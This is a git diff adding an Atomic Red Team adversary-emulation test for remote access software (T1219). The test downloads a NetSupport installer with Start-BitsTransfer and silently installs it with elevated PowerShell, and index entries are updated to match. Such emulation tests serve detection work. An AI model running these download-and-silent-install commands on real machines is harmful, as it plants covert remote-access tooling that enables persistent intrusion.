diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 482b0528..c60142c3 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1185,6 +1185,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 6967ae8f..578c39c2 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -860,6 +860,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 46af6a54..36b04a9e 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1995,6 +1995,7 @@
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
+ - Atomic Test #8: NetSupport - RAT Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 8d45c717..ee67c693 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1440,6 +1440,7 @@
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
+ - Atomic Test #8: NetSupport - RAT Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3263a033..d8e1930c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -87541,6 +87541,41 @@ command-and-control:
-Name \"RPCService\" -force -erroraction silentlycontinue\n"
name: powershell
elevation_required: true
+ - name: NetSupport - RAT Execution
+ auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75
+ description: "A recent trend by threat actors, once a foothold is established,
+ maintain long term persistence using third party remote services such as NetSupport
+ to provide the operator with access to the network using legitimate services.
+ \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ NetSupport_Path:
+ description: Path to the NetSupport executable.
+ type: Path
+ default: "$env:temp\\T1219Setup.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'NetSupport must be downloaded and exist on the disk at the specified
+ location. (#{NetSupport_Path})
+
+ '
+ prereq_command: 'if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe"
+ -Destination "$env:temp\T1219Setup.exe" -dynamic
+
+ '
+ executor:
+ command: 'Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+
+ '
+ cleanup_command: 'Stop-Process -Name "client32" -force -erroraction silentlycontinue
+
+ '
+ name: powershell
+ elevation_required: true
T1079:
technique:
x_mitre_platforms:
diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
index e06e531b..9fe4211e 100644
--- a/atomics/T1219/T1219.md
+++ b/atomics/T1219/T1219.md
@@ -22,6 +22,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
- [Atomic Test #7 - RemotePC Software Execution](#atomic-test-7---remotepc-software-execution)
+- [Atomic Test #8 - NetSupport - RAT Execution](#atomic-test-8---netsupport---rat-execution)
+
@@ -311,4 +313,53 @@ Start-BitsTransfer -Source "https://static.remotepc.com/downloads/rpc/140422/Rem
+
+
+
+## Atomic Test #8 - NetSupport - RAT Execution
+A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as NetSupport to provide the operator with access to the network using legitimate services.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ecca999b-e0c8-40e8-8416-ad320b146a75
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| NetSupport_Path | Path to the NetSupport executable. | Path | $env:temp\T1219Setup.exe|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "client32" -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: NetSupport must be downloaded and exist on the disk at the specified location. (#{NetSupport_Path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe" -Destination "$env:temp\T1219Setup.exe" -dynamic
+```
+
+
+
+